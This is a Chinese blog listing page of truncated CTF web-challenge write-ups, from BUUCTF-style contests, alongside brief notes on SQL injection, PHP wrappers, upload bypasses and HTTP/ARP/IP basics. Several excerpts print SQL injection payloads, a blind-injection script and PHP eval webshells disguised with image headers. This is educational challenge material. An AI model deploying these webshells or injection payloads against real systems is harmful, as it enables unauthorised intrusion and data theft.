- 博客(34)
- 收藏
- 关注
RSS订阅原创 [安洵杯 2019]easy_serialize_php
打开题目,得到源码<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SESSION){ unset($_SESSI
2021-11-15 22:30:25
74
原创 [BJDCTF2020]Cookie is so stable
打开题目,看着像注入,测试发现确实存在模板注入但回显的数据是根据客户端发送的cookie确定的。提交表单后,服务端给客户端重定向并根据表单信息设置cookie,客户端被重定向时会发送刚刚得到的cookie,服务端根据cookie回显数据。但其实这题的重定向只是再次访问了flag.php。具体请自行F12查看。测试发现是Twig模板,根据网上大量的Twig模板注入payload即可得到flag...
2021-11-12 16:31:45
1425
原创 [BSidesCF 2020]Had a bad day
打开题目,发现可疑网址index.php?category=woofers测试参数时发现可能存在后缀为php的文件包含index.php?category=woofers%20aWarning: include(woofers a.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37Warning: include(): Failed opening ‘woo
2021-11-11 21:19:46
726
原创 [网鼎杯 2020 朱雀组]phpweb
打开题目Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, yo
2021-11-05 15:50:16
112
原创 [安洵杯 2019]easy_web
打开题目,网址为index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=这两个参数似乎可以利用对img参数进行测试,发现加载的图片好像是由img决定的对TXpVek5UTTFNbVUzTURabE5qYz0base64解码得到MzUzNTM1MmU3MDZlNjc=,再次解码得到3535352e706e67,再hex解码得到555.png那可以直接得到index.php的源码 ,那岂不是也可以直接拿到flagindex.php?img=Tm
2021-11-03 16:53:30
224
原创 [GWCTF 2019]我有一个数据库
打开题目鎴戞湁涓€涓暟鎹簱锛屼絾閲岄潰浠€涔堜篃娌℃湁~涓嶄俊浣犳壘直接查看没什么提示,那就先扫一遍目录有 robots.txt 和 phpmyadminrobots.txtUser-agent: *Disallow: phpinfo.php访问,得到 phpinfo() 界面phpmyadmin 直接进入后台管理,但没有得到任何数据,看看这个版本的phpmyadmin有什么可以利用的漏洞搜索出来一大堆,直接借着现成的payload就行了...
2021-11-01 12:15:33
306
原创 [SUCTF 2019]EasySQL
打开题目,简单测试,可以发现是数字型注入对于提交的数据,字符不回显,除零回显不同外,任何数字都有相同回显,union被过滤,但在尝试堆叠注入时成功。query=1;show tables;Array ( [0] => 1 ) Array ( [0] => Flag )在后续测试中发现,如果在提交的数字后加入分号,则回显的数据为提交的数字,猜测查询语句的前半段为select $_POST['query'] ...验证query=13;select 4Array ( [0
2021-10-30 16:30:55
129
原创 [CISCN2019 华北赛区 Day2 Web1]Hack World
打开题目,简单测试发现是数字型注入且大部分关键字都被过滤,尝试布尔盲注。id=0^((substr((select(flag)from(flag)),1,1))='f')回显id=1时的界面说明注入成功,用脚本即可跑出flagimport requestsurl = "http://88cefe6c-611d-488c-89c1-a6ae8a08a682.node4.buuoj.cn:81/index.php"dat = { "id" : ""}for i in range(1,60):
2021-10-28 17:25:25
146
原创 SQL注入
堆叠注入union注入报错注入 updatexml() , extractvalue()截断字符串substr()mid()substring()left()right()常用函数database()version()user()concat()group_concat()绕过()代替空格双写大小写内联注释...
2021-10-27 19:19:33
136
原创 [极客大挑战 2019]HardSQL
打开题目,SQL注入,看来是有严格限制,但好在没过滤引号输入部分SQL关键字测试发现过滤了的关键字有union(空格)=/*union注入和堆叠注入均为失败,但会回显报错信息,可以尝试报错注入这里使用updatexml()库名check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23XPATH syntax error: ‘~geek~’表名check
2021-10-27 17:11:24
62
原创 [网鼎杯 2020 青龙组]AreUSerialz
打开题目,获得一大段代码<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $c
2021-10-26 20:49:13
58
原创 [网鼎杯 2018]Fakebook
打开题目,先看看有什么功能,发现查看用户时,网址为view.php?no=1尝试view.php?no=0得到报错界面。尝试用"order by"测试,发现存在SQL注入,且得出字段数为4开始尝试查询view.php?no=0%20union%20select%201,2,3,4回显no hack _用内联注释绕过view.php?no=1%20/*!%20union*/%20select%201,2,3,4%20limit%201,1然而出现了奇怪的报错回显第二个
2021-10-25 21:43:31
189
原创 [MRCTF2020]Ez_bypass
打开题目I put something in F12 for you include 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got
2021-10-25 19:02:09
105
原创 php伪协议
file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流(I/O streams)zlib:// — 压缩流data:// — 数据(RFC 2397)glob:// — 查找匹配的文件路径模式phar:// — PHP 归档ssh2:// — Secure Shell 2rar:// — RARogg:// — 音频流expect:// — 处理交互式的流常用dat.
2021-10-24 15:23:10
43
原创 [ZJCTF 2019]NiZhuanSiWei
打开题目<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br
2021-10-24 15:00:54
87
原创 php中可以代替执行linux命令的函数
执行代码eval()assert()执行命令system()exec()shell_exec()文件操作查看 scandir()读取 get_file_contents()
2021-10-23 17:34:40
354
原创 shell上传
前端文件后缀限制抓包修改后端文件后缀限制上传.user.ini文件利用apache解析漏洞,加上无法解析的后缀,如上传shell.php.abc文件头检查加上图片文件头,如GIF8a文件内容检查<script language=‘php’> 代替 <?php...
2021-10-23 17:12:34
325
原创 [SUCTF 2019]CheckIn
打开题目,常规的文件上传经过各种上传测试,似乎在后端有文件后缀检测且难以绕过但可以上传.user.ini文件,且上传文件成功后会主动给出路径,而这个路径下恰好有一个php文件上传木马GIF8a<script language='php'>@eval($_POST['door']);</script>得到木马路径Your dir uploads/0e2baa5f405a4e8f1b40ce791fae880aYour files :array(4) { [0]=&
2021-10-23 17:02:14
163
原创 [护网杯 2018]easy_tornado
打开题目,获得三个txt文件/flag.txt/welcome.txt/hints.txt逐个查看/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))注意网址file?filename=/hints.txt&filehash=a5e3bf0b05c444070549eeced63bdeab那么我们应该是要访问file?f
2021-10-22 19:11:08
89
原创 [极客大挑战 2019]BabySQL
打开题目,输入测试语句admin'123回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘123’’ at line 1那么我们有理由怀疑查询username和password的SQL语句是同一句admin';123You have an error in
2021-10-20 20:32:51
86
原创 php中字符串与数值的比较
我们知道PHP是一门弱类型语言,当涉及“==”判断时,它的表现是有一些奇特的。例如,“a==0”将会得到true,“a==1”将会得到false。原理:PHP语言中在涉及“==”判断时,如果运算符两边分别为字符串(不以数字开头的字符串),会将字符串转化为数字0,再进行比较。如果是以数字开头的字符串,那么它将会转化成开头的数字(即第一个字母前的所有数字)。(int)"787abe"=787 (int)"abc"=0 (int)"1a2b"=1 (int)"a12b"=0 (
2021-10-19 20:18:23
690
原创 [HCTF 2018]WarmUp
打开题目,无线索,查看源码,提示source.php访问,得到源码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isse
2021-10-19 20:12:49
48
原创 PHP序列化
PHP序列化函数和反序列化函数为serialize(),unserialize()序列化字符串格式为 布尔值(bool) b:value 整数型(int) i:value 字符串型(str) s:length:"value" 数组型(array) a:length:{...} 对象型(object) O:length:class_name:properties_number{...} NULL型__wakeup()绕过CVE-2016-7124.
2021-10-18 20:28:36
308
原创 [极客大挑战 2019]PHP
打开题目,提示备份网站,直接扫描目录,得到www.zip解压得到class.php,index.php,flag.php等源码index.php中关键代码为 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>class.php为<?phpinclude 'flag.php';error_reporting(0);
2021-10-18 12:42:36
660
原创 [RoarCTF 2019]Easy Calc
打开题目,查看源码,发现关键代码<!--I've set up WAF to ensure security.--><script> $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:functio
2021-10-17 16:50:12
84
原创 [极客大挑战 2019]LoveSQL
显然是一道SQL注入题在用户名和密码处输入引号测试,可以发现是单引号闭合。输入以下进行测试q';test123回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘test’ and password=‘123’’ at line 1此时很容易想到输入a1' or
2021-10-16 22:29:09
77
原创 [ACTF2020 新生赛]Upload
打开题目,文件上传选择后缀为php的shell上传,弹出警告该文件不允许上传,请上传jpg、png、gif结尾的图片噢!将文件后缀改为jpg,上传成功Upload Success! Look here~ ./uplo4d/394659692a460258b45a99f1424ea357.jpg再次上传,并抓包将后缀改为phtmlUpload Success! Look here~ ./uplo4d/71056c0c9cb12f2b7d720156da9eabf1.phtml上传成功
2021-10-15 15:13:53
213
原创 [极客大挑战 2019]Upload
打开题目,为文件上传尝试上传后缀为php的木马<?php @eval($_GET['door']); ?>结果Not image!将后缀改为jpg,结果NO! HACKER! your file included ‘<?’将木马改为<script language='php'>@eval($_GET['door']);</script>再次上传,结果Don’t lie to me, it’s not image at all!!!
2021-10-14 22:15:58
152
原创 [GYCTF2020]Blacklist
打开题目网址,是一个表单。输入引号测试,输入单引号时,出现如下报错error 1064 : You have an error in your SQL syntax; check themanual that corresponds to your MariaDB server version for theright syntax to use near ‘1’’’ at line 1继续输入SQL语句测试,出现如下returnpreg_match("/set|prepare|alte
2021-10-14 19:55:06
82
原创 HTTP协议
http:超文本传输协议,属于应用层协议通过浏览器,我们可以很方便地用http协议与其他主机通信。当然我们也可以使用curl,但浏览器会帮我们解析HTML,而curl不会。(curl是什么?打开命令行,输入“man curl ”)HTTP请求与HTTP响应对于使用http协议通信的应用,在数据包的应用数据段具有统一的格式。第一行为请求行(响应行),第二行起至空白行前为请求头(响应头),空白行后为请求正文(响应正文)。如下为一个HTTP请求POST /example.php HTTP/1.1Ho
2021-06-06 18:49:50
118
1
原创 arp协议
处于同一子网下的两台主机需要通信时,不仅需要对方的IP地址,还需要对方的MAC地址。arp协议可用于网络层地址(IP地址)和链路层地址(MAC地址)间的映射。假设有A主机192.168.31.2需要和B主机192.168.31.3通信,A已经知道B的IP地址了,接下来需要获取B的MAC地址,这个时候A查询arp表,如果没有对应主机B的表项,就会广播一个arp分组请求B的MAC地址,子网里除B外其他主机都不响应A,B则会将自己的MAC地址发送给A,那么A就能向B发送数据了。arp表打开命令行,输入"
2021-05-29 12:57:13
370
原创 IP数据报首部
一般IP数据报首部为20byte,即160bit(“一般”指不带选项的首部)依顺序各个位置含义如下:• 4bit:协议版本号,目前广泛使用的为IPv4• 4bit:首部长度除以32(单位为bit),如160bit是32bit的5倍,则为5• 8bit:服务类型(TOS),通过特定的数值来表明需要何种服务,控制最小时延、最大吞吐量等,• 16bit:数据报总长度,16bit意味着最大长度可以达到65535bit,注意这里指的是IP数据报,并不包括以太网首部或以太网尾部的长度• 16bit:用于标识
2021-05-22 22:04:43
3280
原创 IP地址
根据IP地址第一个十进制数可以判断该IP地址类别0-127 A类地址128-191 B类地址192-223 C类地址224-239 D类地址240-247 E类地址既然可以根据此判断网络号和主机号,那么子网掩码有什么用呢答:子网掩码可以用来区分子网号例如一个IP地址:172.31.64.1 ,子网掩码:255.255.240.0我们可以很容易发现这是一个B类地址,这意味着网络号是172.31把剩下的十进制数转换为二进制,240.0 为1111 0000 0000 000064.1为
2021-05-22 22:00:07
307
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人